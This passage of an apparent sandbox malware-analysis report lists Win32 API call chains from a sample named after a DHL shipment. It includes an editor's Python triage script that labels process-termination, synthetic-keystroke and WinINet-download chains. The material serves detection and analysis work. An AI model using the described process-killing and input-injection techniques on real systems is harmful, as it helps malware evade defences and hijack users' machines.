• Instruction ID: cea7905f47565af1bf3bb38af934546835d8e6a2f4f1605b4e78a61dbb2c5db8
• Opcode Fuzzy Hash: 83fc71c9605e44eb074bbdc43b93b94133c64268e28e5c67e7685f0b016699c6
• Instruction Fuzzy Hash: 1E517F71204314AFD704DF24DC6AFAA7BE4FB88714F40062DF996972E1DB71A944CBA2
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0089C272
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0089C29A
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0089C2CA
• GetLastError.KERNEL32 ref: 0089C322
• SetEvent.KERNEL32(?), ref: 0089C336
• InternetCloseHandle.WININET(00000000), ref: 0089C341
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: 437eba82058aa035e6bfd271c601abc2f9a400665adb954575c43ab39e06b5ba
• Instruction ID: 89e54ea509f86908362b55809aea415706d1f14c7afd1d476531c800645e7fcc
• Opcode Fuzzy Hash: 437eba82058aa035e6bfd271c601abc2f9a400665adb954575c43ab39e06b5ba
• Instruction Fuzzy Hash: FE3150B1600608AFDB21AFA9CC88AAB7BFCFB49744F18851DF446D2201DB76DD049B65
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00863AAF,?,?,Bad directive syntax error,008BCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 008898BC
• LoadStringW.USER32(00000000,?,00863AAF,?), ref: 008898C3
  • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00889987
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
• Opcode ID: 04275180b277853f4684cdcf086fa8c423ec0dfd74a76ed640d975ff4415c456
• Instruction ID: 4644bc344b95123e1bc8bc537a46e1a8804c0c76625fbadd0740236b33666db2
• Opcode Fuzzy Hash: 04275180b277853f4684cdcf086fa8c423ec0dfd74a76ed640d975ff4415c456
• Instruction Fuzzy Hash: 4E217131C0021EABCF11EF94DC1AEEE7735FF28304F084465F515A11A2EB759668DB51
APIs
• GetParent.USER32 ref: 008820AB
• GetClassNameW.USER32(00000000,?,00000100), ref: 008820C0
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0088214D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
• Opcode ID: b1fdee6edc94dd6db365a18e57936d5b476ee107c3b95d51f1d710ef09cb539a
• Instruction ID: 4ee54d269e40ffa024e5d53ae7aebfb645f71114dd20ab85c3131fa191fa0fd4
• Opcode Fuzzy Hash: b1fdee6edc94dd6db365a18e57936d5b476ee107c3b95d51f1d710ef09cb539a
• Instruction Fuzzy Hash: 0B11067A6C871ABAF6017225DC0ADAA379CFB16728B30111AFB04E51D2FFA578015715
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eef4e3a1bdf094090785d530d49083a89059dcb25d836d53b6c991692f6cf8ce
• Instruction ID: 776a72030e09a89c87e5e0c5806f366296d90cbbcde5a4bff66537f8dd558344
• Opcode Fuzzy Hash: eef4e3a1bdf094090785d530d49083a89059dcb25d836d53b6c991692f6cf8ce
• Instruction Fuzzy Hash: 2FC1DC74A04249EFCF119FA8C845BADBBB4FF09312F08419AE955E73D2CB709949CB61
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                            • String ID:
                                                                                            • API String ID: 1282221369-0
                                                                                            • Opcode ID: 60b12d9a356183070df2d03d1211e6e14041be28053bd37b942b3905b101aea7
                                                                                            • Instruction ID: 165a1e7f1143eb2ab4162758e3b5c6a5fc1e0f0fa182b8ad192cfa09ae53a4d9
                                                                                            • Opcode Fuzzy Hash: 60b12d9a356183070df2d03d1211e6e14041be28053bd37b942b3905b101aea7
                                                                                            • Instruction Fuzzy Hash: 4B611371904314AFDF21AFB8D881A6E7BA5FF06362F14426DFD40E7282DA719D09CB91
                                                                                            APIs
                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00876890
                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008768A9
                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008768B9
                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008768D1
                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008768F2
                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00838874,00000000,00000000,00000000,000000FF,00000000), ref: 00876901
                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0087691E
                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00838874,00000000,00000000,00000000,000000FF,00000000), ref: 0087692D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 1268354404-0
                                                                                            • Opcode ID: 193eca67935a8b69f70a0747b40042fb88d9c467873645d72c1764d40fe6b45b
                                                                                            • Instruction ID: ed03dcfcf12da8492f771065f8ba2f13b01889f77b98cf08d6de5caf91ec39ce
                                                                                            • Opcode Fuzzy Hash: 193eca67935a8b69f70a0747b40042fb88d9c467873645d72c1764d40fe6b45b
                                                                                            • Instruction Fuzzy Hash: 5E515A7060070AEFDB20CF24CC55FAABBA5FB98760F104528F956D62A0EB70E950DB90
                                                                                            APIs
                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0089C182
                                                                                            • GetLastError.KERNEL32 ref: 0089C195
                                                                                            • SetEvent.KERNEL32(?), ref: 0089C1A9
                                                                                              • Part of subcall function 0089C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0089C272
                                                                                              • Part of subcall function 0089C253: GetLastError.KERNEL32 ref: 0089C322
                                                                                              • Part of subcall function 0089C253: SetEvent.KERNEL32(?), ref: 0089C336
                                                                                              • Part of subcall function 0089C253: InternetCloseHandle.WININET(00000000), ref: 0089C341
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                            • String ID:
                                                                                            • API String ID: 337547030-0
                                                                                            • Opcode ID: f4b9727a19814b60f4552d4e6f7fb51626455c398e5f084903c493b306ecb8a5
                                                                                            • Instruction ID: de5cce2f238491a67df9d323f7320bf0e4c9d24c169d6d9628590a529e1d5e32
                                                                                            • Opcode Fuzzy Hash: f4b9727a19814b60f4552d4e6f7fb51626455c398e5f084903c493b306ecb8a5
                                                                                            • Instruction Fuzzy Hash: 28316A71600605AFDF21AFE9DC44A66BBF9FF58300B18452DF956C6610DB32E8149BA0
                                                                                            APIs
                                                                                              • Part of subcall function 00883A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00883A57
                                                                                              • Part of subcall function 00883A3D: GetCurrentThreadId.KERNEL32 ref: 00883A5E
                                                                                              • Part of subcall function 00883A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008825B3), ref: 00883A65
                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 008825BD
                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008825DB
                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 008825DF
                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 008825E9
                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00882601
                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00882605
                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 0088260F
                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00882623
                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00882627
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2014098862-0
                                                                                            • Opcode ID: 32330a04de0a82f4be395286297a9213e4e15115c8304a829d84876cc35a41e0
                                                                                            • Instruction ID: 0a41275322fe59fdcce52572f0d078e2646117341cb4c567ddcc80125dcbec5e
                                                                                            • Opcode Fuzzy Hash: 32330a04de0a82f4be395286297a9213e4e15115c8304a829d84876cc35a41e0
                                                                                            • Instruction Fuzzy Hash: E801B170290624BBFB1067689C8AF593F59EB5EB12F100106F358EE0D1C9E224448A6A
                                                                                            APIs
                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00881449,?,?,00000000), ref: 0088180C
                                                                                            • HeapAlloc.KERNEL32(00000000,?,00881449,?,?,00000000), ref: 00881813
                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00881449,?,?,00000000), ref: 00881828
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00881449,?,?,00000000), ref: 00881830
                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00881449,?,?,00000000), ref: 00881833
                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00881449,?,?,00000000), ref: 00881843
                                                                                            • GetCurrentProcess.KERNEL32(00881449,00000000,?,00881449,?,?,00000000), ref: 0088184B
                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00881449,?,?,00000000), ref: 0088184E
                                                                                            • CreateThread.KERNEL32(00000000,00000000,00881874,00000000,00000000,00000000), ref: 00881868
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 1957940570-0
                                                                                            • Opcode ID: 057d1b65812cd165a7b23f59c3435481dbc956c4e42663a44e11c792847b64c1
                                                                                            • Instruction ID: 94dfd0748f12548d0593dcbc126ad9e55d041cad46c2352a116075fd6ac7a052
                                                                                            • Opcode Fuzzy Hash: 057d1b65812cd165a7b23f59c3435481dbc956c4e42663a44e11c792847b64c1
                                                                                            • Instruction Fuzzy Hash: 4A016FB5640344BFE710AFA5DC4DF577BACFB89B11F414521FA05EB291DA759800CB60
                                                                                            APIs
                                                                                              • Part of subcall function 0088D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0088D501
                                                                                              • Part of subcall function 0088D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0088D50F
                                                                                              • Part of subcall function 0088D4DC: CloseHandle.KERNEL32(00000000), ref: 0088D5DC
                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008AA16D
                                                                                            • GetLastError.KERNEL32 ref: 008AA180
                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008AA1B3
                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 008AA268
                                                                                            • GetLastError.KERNEL32(00000000), ref: 008AA273
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008AA2C4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                            • String ID: SeDebugPrivilege
                                                                                            • API String ID: 2533919879-2896544425
                                                                                            • Opcode ID: dbad7f9b49f80872ba16490a800ac0061e054c56467591f943df6a700c866c4c
                                                                                            • Instruction ID: 11f830b0fe61f371a2afbbf36ee1140e95b13b0e06e67c22260ea86e623e07c1
                                                                                            • Opcode Fuzzy Hash: dbad7f9b49f80872ba16490a800ac0061e054c56467591f943df6a700c866c4c
                                                                                            • Instruction Fuzzy Hash: 12616E30204242AFE714DF18C494F2ABBE5FF45318F14849CE4668BBA2C776EC85CB92
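Read as chains rather than as isolated imports, three of the listings above carry the behaviour an analyst cares about: the function that calls AttachThreadInput and then posts WM_KEYDOWN (0x100) and WM_KEYUP (0x101) with VK_LEFT (0x25) and VK_RIGHT (0x27) to another thread's window; the WinINet function that opens a connection and a URL and signals an event; and the function that walks processes with CreateToolhelp32Snapshot/Process32FirstW, opens each candidate with OpenProcess(0x00000001 = PROCESS_TERMINATE) and calls TerminateProcess, tagged with the string SeDebugPrivilege. The Python below is an added example by the editor, not Joe Sandbox tooling and not code from the sample or from the AutoIt runtime the report's signature points to. It parses listing lines exactly as printed on this page (the embedded lines are copied from those three functions), decodes the relevant Win32 constants, and labels the chains; the chain labels, the VK_NAMES table and the set of WinINet imports it looks for are the editor's assumptions. Two caveats apply to any rule built this way: the listing records which imports a function references and which argument values the analyzer could resolve (the "?" entries are unresolved), not proof that the call ran during this analysis, and resolved values are best-effort, as the three MapVirtualKeyW entries above show 0x25 on every call while the posted virtual key changes from VK_LEFT to VK_RIGHT.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox code dump.

Added example (editor's code; not Joe Sandbox tooling, the sample, or the AutoIt
runtime). Parses listing lines as printed on this page, decodes the Win32
constants the chains depend on, and labels behaviour chains for triage.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

# One listing line, e.g.
#   • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008AA16D
#   • GetLastError.KERNEL32 ref: 008AA180      (no argument list)
#   • Part of subcall function 0088D4DC: CloseHandle.KERNEL32(00000000), ref: 0088D5DC
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants from the SDK headers.
WM_KEYDOWN, WM_KEYUP = 0x0100, 0x0101
VK_NAMES = {0x25: "VK_LEFT", 0x26: "VK_UP", 0x27: "VK_RIGHT", 0x28: "VK_DOWN"}
PROCESS_TERMINATE = 0x0001


@dataclass
class ApiCall:
    name: str
    module: str
    args: list              # int for a value the analyzer resolved, None for "?"
    ref: int                # call-site address from the "ref:" field
    subcall: int | None     # callee address when marked "Part of subcall function"


def parse_api_lines(text: str) -> list[ApiCall]:
    """One ApiCall per listing line; non-API lines (headings, hashes) are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = (m.group("args") or "").strip()
        args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), sub))
    return calls


def classify(calls: list[ApiCall]) -> list[str]:
    """Label the behaviour chains in one function (subcall entries count). Labels are the editor's."""
    names = {c.name for c in calls}
    found = []
    # Toolhelp walk -> OpenProcess(PROCESS_TERMINATE, ...) -> TerminateProcess: kill a process by name.
    opens_to_kill = any(c.name == "OpenProcess" and c.args and c.args[0] is not None
                        and c.args[0] & PROCESS_TERMINATE for c in calls)
    if "CreateToolhelp32Snapshot" in names and opens_to_kill and "TerminateProcess" in names:
        found.append("process-termination-by-name")
    # AttachThreadInput to the target's input queue, then post WM_KEYDOWN/WM_KEYUP to its window.
    posts_keys = any(c.name == "PostMessageW" and len(c.args) > 1
                     and c.args[1] in (WM_KEYDOWN, WM_KEYUP) for c in calls)
    if "AttachThreadInput" in names and posts_keys:
        found.append("synthetic-keystrokes")
    if names & {"InternetOpenW", "InternetConnectW", "InternetOpenUrlW"}:
        found.append("wininet-download")
    return found


def decode_keystrokes(calls: list[ApiCall]) -> list[tuple[str, str]]:
    """Render PostMessageW(hwnd, WM_KEYDOWN|WM_KEYUP, vk, lparam) entries as (message, key) pairs."""
    events = []
    for c in calls:
        if c.name == "PostMessageW" and len(c.args) >= 3 and c.args[1] in (WM_KEYDOWN, WM_KEYUP):
            vk = c.args[2]
            key = "?" if vk is None else VK_NAMES.get(vk, f"0x{vk:02X}")
            events.append(("WM_KEYDOWN" if c.args[1] == WM_KEYDOWN else "WM_KEYUP", key))
    return events


# Listing lines copied from this report's process-kill, keystroke and WinINet functions.
PROCESS_KILL_LINES = """
• Part of subcall function 0088D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0088D501
• Part of subcall function 0088D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0088D50F
• Part of subcall function 0088D4DC: CloseHandle.KERNEL32(00000000), ref: 0088D5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 008AA16D
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 008AA1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 008AA268
• CloseHandle.KERNEL32(00000000), ref: 008AA2C4
"""
KEYSTROKE_LINES = """
• Part of subcall function 00883A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008825B3), ref: 00883A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 008825BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008825DB
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00882601
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00882623
"""
WININET_LINES = """
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0089C182
• SetEvent.KERNEL32(?), ref: 0089C1A9
• Part of subcall function 0089C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0089C272
"""
```

Feed each "APIs" block of the report to parse_api_lines and run classify on the result; the subcall entries are deliberately kept in the call set because the report attributes the Toolhelp walk to a helper at 0088D4DC rather than to the terminating function itself. For the GUI-only functions on this page (icon, menu, list-view and heap/thread wrappers) classify returns an empty list, which is the intended noise floor for a rule of this kind.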
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008B3925
                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 008B393A
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008B3954
                                                                                            • _wcslen.LIBCMT ref: 008B3999
                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 008B39C6
                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008B39F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                            • String ID: SysListView32
                                                                                            • API String ID: 2147712094-78025650
                                                                                            • Opcode ID: 44eec8023455b662ad9956eaee52cec2862d83a15d1af05005e69f8d809ecd08
                                                                                            • Instruction ID: a69b4594eb7fbbf172e2897dad2ad8cc748212ffc671da8150cee0626743ca0a
                                                                                            • Opcode Fuzzy Hash: 44eec8023455b662ad9956eaee52cec2862d83a15d1af05005e69f8d809ecd08
                                                                                            • Instruction Fuzzy Hash: AC41B471A00218ABEF219F64CC49FEA7BA9FF19354F10052AF958E7391D7B19D80CB90
                                                                                            APIs
                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0088BCFD
                                                                                            • IsMenu.USER32(00000000), ref: 0088BD1D
                                                                                            • CreatePopupMenu.USER32 ref: 0088BD53
                                                                                            • GetMenuItemCount.USER32(00B38200), ref: 0088BDA4
                                                                                            • InsertMenuItemW.USER32(00B38200,?,00000001,00000030), ref: 0088BDCC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                            • String ID: 0$2
                                                                                            • API String ID: 93392585-3793063076
                                                                                            • Opcode ID: 2bce46c12a522bde595f1fa0005999fe387560c36fea9ae3261394ae87880302
                                                                                            • Instruction ID: 00805d4080e814d709776a1ffb31b378674873aae7a8f2bcf50f400a3e6aee29
                                                                                            • Opcode Fuzzy Hash: 2bce46c12a522bde595f1fa0005999fe387560c36fea9ae3261394ae87880302
                                                                                            • Instruction Fuzzy Hash: B451B070A00209EBDF20EFA8D884BAEBBF4FF85314F144219E451D72A1D7709D45CB61
                                                                                            APIs
                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 0088C913
                                                                                            Strings
                                                                                            Memory Dump Source
